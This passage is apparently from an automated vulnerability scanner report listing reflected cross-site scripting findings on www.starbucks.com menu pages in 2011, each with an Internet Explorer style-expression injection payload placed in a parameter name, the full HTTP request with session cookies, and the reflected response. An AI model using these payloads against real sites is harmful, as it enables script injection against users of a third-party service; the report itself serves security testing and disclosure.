The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1b5d"style="x:expression(alert(1))"335d173fd30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/zucchini-walnut-muffin?b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:58:53 GMT Connection: close Content-Length: 43532
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin?b1b5d"style="x:expression(alert(1))"335d173fd30=1"/> ...[SNIP]...
1.860. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed0f5"style="x:expression(alert(1))"926577702c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:59:01 GMT Connection: close Content-Length: 41980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style="x:expression(alert(1))"926577702c9=1"/> ...[SNIP]...
1.861. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc8c9"style="x:expression(alert(1))"dbeae4face2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:01:47 GMT Connection: close Content-Length: 41397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style="x:expression(alert(1))"dbeae4face2=1"/> ...[SNIP]...
1.862. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/fruit-and-snack-plates/protein-plate
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b24"style%3d"x%3aexpression(alert(1))"e4919033202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7b24"style="x:expression(alert(1))"e4919033202 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/fruit-and-snack-plates/protein-plate?c7b24"style%3d"x%3aexpression(alert(1))"e4919033202=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:00:00 GMT Connection: close Content-Length: 42074
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate?c7b24"style="x:expression(alert(1))"e4919033202=1"/> ...[SNIP]...
1.863. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 576ec"style="x:expression(alert(1))"20b9b21506b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:44:39 GMT Connection: close Content-Length: 42517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style="x:expression(alert(1))"20b9b21506b=1"/> ...[SNIP]...
1.864. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0a4"style="x:expression(alert(1))"0ec2a3fedc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:45:52 GMT Connection: close Content-Length: 43047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style="x:expression(alert(1))"0ec2a3fedc3=1"/> ...[SNIP]...
1.865. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/hot-breakfast/oatmeal-brown-sugar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9dc0"style="x:expression(alert(1))"2675c27b610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:45:15 GMT Connection: close Content-Length: 41085
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style="x:expression(alert(1))"2675c27b610=1"/> ...[SNIP]...
1.866. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/hot-breakfast/oatmeal-dried-fruit
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5905"style="x:expression(alert(1))"78a9793c5f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:45:09 GMT Connection: close Content-Length: 41314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style="x:expression(alert(1))"78a9793c5f2=1"/> ...[SNIP]...
1.867. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/hot-breakfast/oatmeal-mixed-nuts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa5a1"style="x:expression(alert(1))"e5e65ed367b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:46:12 GMT Connection: close Content-Length: 41158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style="x:expression(alert(1))"e5e65ed367b=1"/> ...[SNIP]...
1.868. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3953"style="x:expression(alert(1))"8dd8c6a876f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:44:39 GMT Connection: close Content-Length: 42959
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style="x:expression(alert(1))"8dd8c6a876f=1"/> ...[SNIP]...
1.869. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71082"style="x:expression(alert(1))"22e1f1319e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:44:18 GMT Connection: close Content-Length: 42422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style="x:expression(alert(1))"22e1f1319e2=1"/> ...[SNIP]...
1.870. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9099b"style="x:expression(alert(1))"fe560f2ff1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:46:18 GMT Connection: close Content-Length: 41848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style="x:expression(alert(1))"fe560f2ff1f=1"/> ...[SNIP]...
1.871. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a962"style%3d"x%3aexpression(alert(1))"b0910c44384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a962"style="x:expression(alert(1))"b0910c44384 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style%3d"x%3aexpression(alert(1))"b0910c44384=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:43:52 GMT Connection: close Content-Length: 42550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style="x:expression(alert(1))"b0910c44384=1"/> ...[SNIP]...
1.872. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/ice-cream/caramel-macchiato-ice-cream
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df808"style%3d"x%3aexpression(alert(1))"d48af3670c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df808"style="x:expression(alert(1))"d48af3670c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style%3d"x%3aexpression(alert(1))"d48af3670c3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:04:49 GMT Connection: close Content-Length: 38909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style="x:expression(alert(1))"d48af3670c3=1"/> ...[SNIP]...
1.873. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/ice-cream/coffee-ice-cream
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981d"style%3d"x%3aexpression(alert(1))"713a0269255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4981d"style="x:expression(alert(1))"713a0269255 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
